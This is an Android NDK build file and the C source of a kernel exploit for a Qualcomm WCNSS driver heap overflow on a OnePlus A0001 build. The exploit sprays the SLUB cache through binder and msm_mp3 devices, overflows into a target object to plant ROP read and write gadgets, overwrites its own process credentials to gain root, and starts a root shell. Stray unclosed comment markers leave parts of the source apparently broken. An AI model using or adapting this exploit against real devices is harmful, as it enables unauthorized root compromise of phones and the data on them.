LOCAL_PATH := $(call my-dir)

include $(CLEAR_VARS)

LOCAL_SRC_FILES := exploit_mp3.c

LOCAL_MODULE := exploit_mp3

LOCAL_MODULE_TAGS := optional

LOCAL_CFLAGS += -std=c99

LOCAL_LDFLAGS += -static

include $(BUILD_EXECUTABLE)

include $(CLEAR_VARS)

LOCAL_SRC_FILES := exploit_tty.c

LOCAL_MODULE := exploit_tty

LOCAL_MODULE_TAGS := optional

LOCAL_CFLAGS += -std=c99

LOCAL_LDFLAGS += -static

include $(BUILD_EXECUTABLE)

include $(CLEAR_VARS)

LOCAL_SRC_FILES := exploit_tty_bypass_pxn.c

LOCAL_MODULE := exploit_tty_bypass_pxn

LOCAL_MODULE_TAGS := optional

LOCAL_CFLAGS += -std=c99

LOCAL_LDFLAGS += -static

include $(BUILD_EXECUTABLE)

include $(CLEAR_VARS)

LOCAL_SRC_FILES := exploit_mp3_bypass_pxn.c

LOCAL_MODULE := exploit_mp3_bypass_pxn

LOCAL_MODULE_TAGS := optional

LOCAL_CFLAGS += -std=c99

LOCAL_LDFLAGS += -static

include $(BUILD_EXECUTABLE)

include $(CLEAR_VARS)

LOCAL_SRC_FILES := exploit_bypass_pxn.c

LOCAL_MODULE := exploit_bypass_pxn

LOCAL_MODULE_TAGS := optional

LOCAL_CFLAGS += -std=c99

LOCAL_LDFLAGS += -static

include $(BUILD_EXECUTABLE)

ro.build.fingerprint

oneplus/bacon/A0001:5.1.1/LMY48B/YOG4PAS1N0:user/release-keys

ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk

Qucomm WCNSS Driver Heap Overflow: wcnss_wlan_write

#include <stdio.h>

#include <string.h>

#include <fcntl.h>

#include <sys/types.h>

#include <sys/stat.h>

#include <sys/ioctl.h>

#include <sys/mman.h>

#include <malloc.h>

#include <unistd.h>

#include <sys/prctl.h>

#define MAX_FD 8

#define BINDER_MAX_FDS 1010

#define SELINUX_ENFORCING (0xC16A7070)

#define INIT_TASK_ADDRESS (0xC14F6040)

#define COMM_OFFSET ( 0xC14F635C - INIT_TASK_ADDRESS )

#define TASK_OFFSET ( 0xC14F6218 - INIT_TASK_ADDRESS )

#define PID_OFFSET ( 0x0 )

#define CRED_OFFSET ( COMM_OFFSET - 8 )

char *name = "freener_pwn0";

int read_fd = 0;

#define ROP_READ ( 0xC04DBE88 )

unsigned int kernel_read( unsigned int dummy, unsigned int address )

{

unsigned int value;

value = ioctl( read_fd, dummy, address );

return value;

}

#define ROP_WRITE ( 0xC0760FE4 )

int write_fd = 0;

void kernel_write( unsigned int address, unsigned int value )

{

ioctl( write_fd, address, value );

}

#define AID_SYSTEM 1000

int main( int argc, char **argv )

{

int fd[MAX_FD];

int binder_fd[BINDER_MAX_FDS];

pid_t child;

int i = 0;

int z = 0;

/*

prctl( PR_SET_NAME, (unsigned long)name, 0, 0, 0 );

printf( "[+] Begin to Test Exploit\n" );

printf( "[+] uid=%d euid=%d\n", getuid(), geteuid() );

setgid( AID_SYSTEM );

setuid( AID_SYSTEM );

printf( "[+] change to system\n" );

printf( "[+] uid=%d euid=%d\n", getuid(), geteuid() );

printf( "[+] Spray SLUB Cache\n" );

for( ; i < BINDER_MAX_FDS; i++ ) {

binder_fd[i] = open( "/dev/binder", O_RDWR );

if ( binder_fd[i] < 0 ) {

printf( "[-] Can not open binder %d\n", i );

return -1;

}

}

for ( i = 0; i < BINDER_MAX_FDS; i++ ) {

close( binder_fd[i] );

}

for( i=0; i < BINDER_MAX_FDS; i++ ) {

binder_fd[i] = open( "/dev/binder", O_RDWR );

if ( binder_fd[i] < 0 ) {

printf( "[-] Can not open binder %d\n", i );

return -1;

}

}

for ( i=0; i < MAX_FD; i++ ) {

fd[i] = open( "/dev/msm_mp3", O_RDWR | O_NONBLOCK );

if ( fd[i] < 0 ) {

printf( "[-] Can not open /dev/msm_mp3\n" );

return -1;

}

}

printf( "[+] Spray SLUB Cache Down\n" );

int fd_wlan;

char *buffer1 = NULL;

int message1_len = 512 + 0x150+4 - 4;

fd_wlan = open( "/dev/wcnss_wlan", O_RDWR );

if ( fd_wlan < 0 ) {

printf( "[-] Can not open /dev/wcnss_wlan\n" );

return -1;

}

buffer1 = (char *)malloc( message1_len + 4 );

if ( buffer1 == NULL ) {

printf( "[-] No enough memory\n" );

return -1;

}

memset( buffer1, 0, message1_len+4 );

int length = 512;

*(unsigned int *)buffer1 = length;

*(unsigned int *)(buffer1 + length + 0x14C) = ROP_READ;

int count = 0;

close( fd[0] );

close( fd[2] );

count = write( fd_wlan, buffer1, message1_len + 4 );

printf( "[+] Trigger Kernel Execution Code\n" );

int result, target_one = 0;

for ( i=1; i<8; i++ ) {

if ( i==2 ) {

continue;

}

result = ioctl( fd[i], 0x41414141, SELINUX_ENFORCING );

if ( result == 0x1 ) {

target_one = i;

}

}

/*

if ( target_one == 0 ) {

printf( "[-] Overflow to Target Object failed\n" );

return -1;

}

printf( "[+] Overflow object %d \n", target_one );

if ( target_one > 3 ) {

printf( "[-] Overflow Wrong Object \n" );

return -1;

}

read_fd = fd[ target_one ];

close( fd_wlan );

printf( "[+] Current SELINUX Status %x = %x\n",SELINUX_ENFORCING , result );

fd_wlan = open( "/dev/wcnss_wlan", O_RDWR );

if ( fd_wlan < 0 ) {

printf( "[-] Can not open /dev/wcnss_wlan\n" );

return -1;

}

printf( "[+] Open wcanss_wlan again\n" );

*(unsigned int *)(buffer1 + length + 0x14C) = ROP_WRITE;

close(fd[4]);

close( fd[6] );

count = write( fd_wlan, buffer1, message1_len + 4 );

for ( i=1; i<8; i+=2 ){

if ( i == target_one ) {

continue;

}

ioctl( fd[i], SELINUX_ENFORCING, 0x0);

result = ioctl( fd[target_one], 0x41414141, SELINUX_ENFORCING );

if ( result == 0x0) {

write_fd = fd[i];

break;

}

}

if ( i == 9 ) {

printf( "[-] Overflow target object 2 failed\n" );

return -1;

}

printf( "[+] Overflow object %d \n", i );

printf( "[+] Write success %x\n", result );

/**

unsigned int task = 0;

task = kernel_read( 0x10000001, (INIT_TASK_ADDRESS + TASK_OFFSET) );

unsigned int cred = 0;

unsigned int magic = 0;

unsigned int magic1 = 0;

unsigned int comm_address = 0;

char comm_name[17] = { 0 };

unsigned int comm_part_one = 0, comm_part_two = 0, comm_part_three = 0;

do {

//printf( "[+] TASK Address : %x\n", task );

comm_address = task - TASK_OFFSET + COMM_OFFSET;

//printf( "[+] Comm Address : %x\n", comm_address );

comm_part_one = kernel_read( 0x20000002, task - TASK_OFFSET + COMM_OFFSET );

comm_part_two = kernel_read( 0x20000002, task - TASK_OFFSET + COMM_OFFSET + 4 );

comm_part_three = kernel_read( 0x20000002, task - TASK_OFFSET + COMM_OFFSET +8 );

(*(unsigned int *)comm_name) = comm_part_one;

(*(unsigned int *)(comm_name+4)) = comm_part_two;

(*(unsigned int *)(comm_name+8)) = comm_part_three;

//printf( "[+] Command line : %s\n", comm_name );

if ( comm_part_one == 0x65657266 &&

comm_part_two == 0x5F72656E &&

comm_part_three == 0x306E7770 ) {

cred = kernel_read( 0x30000003, task - TASK_OFFSET + CRED_OFFSET );

printf( "[+] CRED address : %x\n", cred );

magic = kernel_read( 0x40000004, cred + 12 );

break;

}

task = kernel_read( 0x20000002, task - TASK_OFFSET + TASK_OFFSET );

} while ( task != (INIT_TASK_ADDRESS + TASK_OFFSET) );

if ( task == INIT_TASK_ADDRESS ) {

printf( "[-] Do not find myself\n" );

}

if ( cred == 0 ) {

printf( "[-] Do not get CRED address\n" );

return -1;

}

if ( magic != 0x43736564 || magic != 0x44656144 ) {

magic = 4;

}

else {

magic = 16;

}

printf( "[+] Modify CRED\n" );

for ( i=0; i<17; i++ ) {

if ( i < 8 ) {

kernel_write( cred + magic + i*4, 0x0 );

}

else if ( i == 8 ) {

continue;

}

else {

kernel_write( cred + magic + i*4, 0xFFFFFFFF );

}

}

if ( getuid() == 0 ) {

printf( "[+] Root Success\n" );

execl( "/system/bin/sh", "/system/bin/sh", NULL );

return 1;

}

printf( "[+] Failed \n" );

return 0;

}